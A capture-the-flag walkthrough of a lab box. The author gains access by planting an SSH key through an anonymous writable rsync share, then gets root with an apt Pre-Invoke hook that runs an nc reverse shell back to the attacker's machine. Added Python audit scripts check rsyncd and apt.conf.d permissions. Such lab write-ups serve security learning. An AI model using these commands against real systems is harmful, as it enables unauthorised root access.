Difficulty: easy

Kali: 192.168.56.104

Target: 192.168.56.195

> arp-scan -l                 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:3d:d3:11       PCS Systemtechnik GmbH
192.168.56.195  08:00:27:da:3d:65       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.930 seconds (132.64 hosts/sec). 3 responded

Port scan

> nmap 192.168.56.195
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 17:08 CST
Nmap scan report for 192.168.56.195
Host is up (0.0072s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
873/tcp open  rsync
MAC Address: 08:00:27:DA:3D:65 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

Connecting to rsync remotely

I did not know what the rsync service was; a web search explains:
rsync is a powerful and efficient file synchronization and backup tool used to sync files and directories between local and remote systems. rsync supports incremental transfers, compressed transfers, excluding specific files, and more. The rsync service (usually implemented through the rsync daemon) makes the synchronization process more automated and flexible.

From that description the service can presumably transfer files, so I looked up the commands for connecting to it:

> rsync rsync://192.168.56.195                 

share           wally (home)
> rsync rsync://192.168.56.195/share/     

drwx------          4,096 2024/07/13 17:11:09 .
lrwxrwxrwx              9 2023/04/23 15:34:26 .bash_history
-rw-------            220 2023/01/15 20:58:06 .bash_logout
-rw-------          3,526 2023/01/15 20:58:06 .bashrc
-rw-------            807 2023/01/15 20:58:06 .profile
-r--------             33 2024/07/11 23:34:21 user.txt
drwx------          4,096 2024/07/13 16:32:43 .gnupg
drwxr-xr-x          4,096 2023/04/29 21:50:29 .local

That gives us a user, wally. Read the flag first:

> rsync rsync://192.168.56.195/share/user.txt .
> cat user.txt      
9e1d45e31***********8760d2108

After checking, the share can also be written to, so write a public key into it:

/tmp  root@kali2  19:42:32
> mkdir .ssh

/tmp  root@kali2  19:42:35
> cp /root/.ssh/id_rsa .ssh/

/tmp  root@kali2  19:42:56
> cp /root/.ssh/id_rsa.pub .ssh/authorized_keys

/tmp  root@kali2  19:43:25
> rsync -avz .ssh rsync://192.168.56.195/share/

sending incremental file list
.ssh/
.ssh/authorized_keys
.ssh/id_rsa

sent 2,929 bytes  received 58 bytes  5,974.00 bytes/sec
total size is 4,150  speedup is 1.39

/tmp  root@kali2  19:43:52
> ssh -i id_rsa wally@192.168.56.195
Warning: Identity file id_rsa not accessible: No such file or directory.
Enter passphrase for key '/root/.ssh/id_rsa': 
wally@send:~$ id
uid=1000(wally) gid=1000(wally) grupos=1000(wally)
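The root cause of this foothold is a daemon module that is listable, writable and unauthenticated, and that exports a home directory while writing files as that user (so the dropped `authorized_keys` is owned by wally and passes sshd's StrictModes check). The following audit script is an added example and not part of the original writeup; the target's real `rsyncd.conf` was never shown, so `SAMPLE_RSYNCD_CONF` is a constructed file that reproduces what the walkthrough observed (`share` described as "wally (home)", anonymous, writable). The keys it parses (`path`, `read only`, `auth users`, `uid`, `list`) are standard `rsyncd.conf` settings; `read only` defaults to `yes`, `auth users` to empty (anonymous), and `uid` to `nobody`.

```python
import re

# Constructed rsyncd.conf mirroring what the walkthrough observed: module
# "share" is listed, exports wally's home, and is writable without credentials.
# A second module shows what an authenticated, read-only export looks like.
SAMPLE_RSYNCD_CONF = """\
uid = wally
gid = wally

[share]
    path = /home/wally
    comment = wally (home)
    read only = no
    list = yes

[backup]
    path = /srv/backup
    read only = yes
    auth users = backup
    secrets file = /etc/rsyncd.secrets
"""


def parse_rsyncd_conf(text):
    """Return (global settings, {module: settings}) from rsyncd.conf text.

    Keys are lower-cased; values set before the first [module] header are
    globals and act as defaults for every module, as rsyncd itself treats them.
    """
    global_cfg, modules = {}, {}
    current = global_cfg
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":  # blank or comment line
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = modules.setdefault(header.group(1).strip(), {})
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            current[key.lower()] = value
    return global_cfg, modules


def _yes(value):
    return value.strip().lower() in ("yes", "true", "1")


def audit_rsyncd(text):
    """Rate every module: ANON_WRITE (no auth users and read only = no),
    ANON_READ (no auth users, read only) or AUTH (auth users configured)."""
    global_cfg, modules = parse_rsyncd_conf(text)
    report = {}
    for name, cfg in modules.items():
        def setting(key, default):
            # module value, else global value, else rsyncd's documented default
            return cfg.get(key, global_cfg.get(key, default))

        anonymous = not setting("auth users", "").strip()
        writable = not _yes(setting("read only", "yes"))
        if anonymous and writable:
            verdict = "ANON_WRITE"
        elif anonymous:
            verdict = "ANON_READ"
        else:
            verdict = "AUTH"
        path = setting("path", "")
        report[name] = {
            "verdict": verdict,
            "path": path,
            "uid": setting("uid", "nobody"),
            # a writable home export lets a client plant ~/.ssh/authorized_keys
            "exports_home": path.startswith("/home/"),
        }
    return report


if __name__ == "__main__":
    for module, info in audit_rsyncd(SAMPLE_RSYNCD_CONF).items():
        print(f"[{module}] {info['verdict']:10} path={info['path']} "
              f"uid={info['uid']} exports_home={info['exports_home']}")
```

Running it on the constructed config prints `share` as `ANON_WRITE` with `exports_home=True` and `backup` as `AUTH`. Any module rated `ANON_WRITE` whose `uid` matches the owner of the exported home is exactly the condition this box was built with; the fix is `read only = yes`, an `auth users` list backed by a `secrets file`, or simply not exporting a home directory.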

Privilege escalation

sudo

wally@send:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for wally: 
sudo: a password is required

Nothing there.

SUID

wally@send:~$ find / -perm -4000   2>/dev/null
/usr/bin/mount
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

Nothing there either.

Upload pspy64 to take a look; it reveals a scheduled task running /usr/bin/apt-get update:

2024/07/13 13:47:39 CMD: UID=0    PID=12230  | /usr/bin/apt-get update 
2024/07/13 13:47:39 CMD: UID=0    PID=12227  | /usr/bin/apt-get update 
2024/07/13 13:47:39 CMD: UID=0    PID=12226  | /bin/sh -c /usr/bin/apt-get update 
2024/07/13 13:47:39 CMD: UID=0    PID=12225  | /usr/sbin/CRON -f 
2024/07/13 13:47:39 CMD: UID=0    PID=12     | 
2024/07/13 13:47:39 CMD: UID=0    PID=110    | 
2024/07/13 13:47:39 CMD: UID=0    PID=11     | 
2024/07/13 13:47:39 CMD: UID=0    PID=109    | 
2024/07/13 13:47:39 CMD: UID=0    PID=108    | 
2024/07/13 13:47:39 CMD: UID=0    PID=107    | 
2024/07/13 13:47:39 CMD: UID=0    PID=106    | 
2024/07/13 13:47:39 CMD: UID=0    PID=105    | 
2024/07/13 13:47:39 CMD: UID=0    PID=103    | 
2024/07/13 13:47:39 CMD: UID=0    PID=10     | 
2024/07/13 13:47:39 CMD: UID=0    PID=1      | /sbin/init 
2024/07/13 13:48:01 CMD: UID=0    PID=13390  | /usr/sbin/CRON -f 
2024/07/13 13:48:01 CMD: UID=0    PID=13391  | /usr/sbin/CRON -f 
2024/07/13 13:48:01 CMD: UID=0    PID=13392  | /bin/sh -c /usr/bin/apt-get update 
2024/07/13 13:48:02 CMD: UID=0    PID=13393  | /usr/bin/apt-get update 
2024/07/13 13:48:02 CMD: UID=0    PID=13394  | /usr/bin/apt-get update 
2024/07/13 13:48:02 CMD: UID=0    PID=13395  | /usr/bin/apt-get update 

Upload linpeas.sh and go through its output:

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/apt/apt.conf.d
/home/wally
/run/lock
/run/user/1000
/run/user/1000/gnupg
/run/user/1000/systemd
/run/user/1000/systemd/inaccessible
/run/user/1000/systemd/inaccessible/dir
/run/user/1000/systemd/inaccessible/reg
/run/user/1000/systemd/units
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/index.html
/tmp/index.html.1
/tmp/.Test-unix
#)You_can_write_even_more_files_inside_last_directory

/var/lib/php/sessions
/var/tmp

linpeas shows that /etc/apt/apt.conf.d is writable. That pairs nicely with the apt-get update cron job: drop a config file there so that the command it configures runs whenever the job fires.

wally@send:~$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.104 4567 >/tmp/f"};' > /etc/apt/apt.conf.d/tao

See https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/ for the details.
Then listen on Kali and the root shell comes back:

> nc -lvnp 4567      
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.195] 44056
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) grupos=0(root)
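apt reads every fragment in /etc/apt/apt.conf.d, and the `APT::Update::Pre-Invoke` family of directives (like `DPkg::Pre-Invoke` and `DPkg::Pre-Install-Pkgs`) are commands run as root on each matching operation, which is why a writable fragment directory plus a root cron job is a complete escalation path. The checker below is an added example rather than anything from the writeup or from apt itself: it flags an apt.conf.d directory (or fragment) that a non-root user can write to, and lists every hook command the fragments would execute. The `demo()` function builds a constructed directory in a temp location (`99hook` with a placeholder command, not the box's real fragment) and makes it world-writable to reproduce what linpeas reported.

```python
import os
import re
import stat
import tempfile

# Directives apt honours from any fragment in apt.conf.d; the quoted strings
# are run as root on the matching operation (update, dpkg invocation, ...).
HOOK_DIRECTIVES = (
    "APT::Update::Post-Invoke-Success",
    "APT::Update::Post-Invoke",
    "APT::Update::Pre-Invoke",
    "DPkg::Pre-Install-Pkgs",
    "DPkg::Pre-Invoke",
    "DPkg::Post-Invoke",
)
# apt matches directive names case-insensitively (the box used "apt::Update")
_CANON = {d.lower(): d for d in HOOK_DIRECTIVES}
_HOOK_RE = re.compile(
    r"(?i)\b(" + "|".join(re.escape(d) for d in HOOK_DIRECTIVES)
    + r")\s*(\{[^}]*\}|\"[^\"]*\")"
)
_QUOTED_RE = re.compile(r'"([^"]*)"')


def find_hooks(text):
    """Return [(canonical directive, command), ...] for hook commands in apt.conf text.

    Handles both the list form  Name {"cmd1"; "cmd2";};  and the scalar form  Name "cmd";
    """
    hooks = []
    for m in _HOOK_RE.finditer(text):
        directive = _CANON[m.group(1).lower()]
        for cmd in _QUOTED_RE.findall(m.group(2)):
            hooks.append((directive, cmd))
    return hooks


def _writable_by_non_root(st):
    """True if the path is owned by a non-root uid or is group/world-writable."""
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_apt_conf_dir(conf_dir):
    """Return [(kind, path, detail)] findings: 'dir'/'file' for weak
    ownership or permissions, 'hook' for each command a fragment would run."""
    findings = []
    if _writable_by_non_root(os.stat(conf_dir)):
        findings.append(("dir", conf_dir, "directory writable by a non-root user"))
    for name in sorted(os.listdir(conf_dir)):
        path = os.path.join(conf_dir, name)
        if not os.path.isfile(path):
            continue
        if _writable_by_non_root(os.stat(path)):
            findings.append(("file", path, "fragment writable by a non-root user"))
        with open(path, encoding="utf-8", errors="replace") as fh:
            for directive, cmd in find_hooks(fh.read()):
                findings.append(("hook", path, f"{directive}: {cmd}"))
    return findings


def demo():
    """Constructed apt.conf.d: one benign fragment, one hook fragment, dir mode 0777."""
    tmp = tempfile.mkdtemp(prefix="apt.conf.d-")
    with open(os.path.join(tmp, "10periodic"), "w") as fh:
        fh.write('APT::Periodic::Update-Package-Lists "1";\n')
    with open(os.path.join(tmp, "99hook"), "w") as fh:
        # placeholder command standing in for the fragment planted on the box
        fh.write('apt::Update::Pre-Invoke {"/tmp/example-hook.sh";};\n')
    os.chmod(tmp, 0o777)  # reproduce the world-writable directory linpeas flagged
    return audit_apt_conf_dir(tmp)


if __name__ == "__main__":
    for kind, path, detail in demo():
        print(f"{kind:5} {path}: {detail}")
```

On a real host run it as `audit_apt_conf_dir("/etc/apt/apt.conf.d")`; a healthy system reports no `dir` or `file` findings and only hooks you recognise (distribution packages do ship legitimate `DPkg::Post-Invoke` entries, so review the command rather than treating every hook as hostile). The directory should be `root:root` mode 0755 and its fragments 0644.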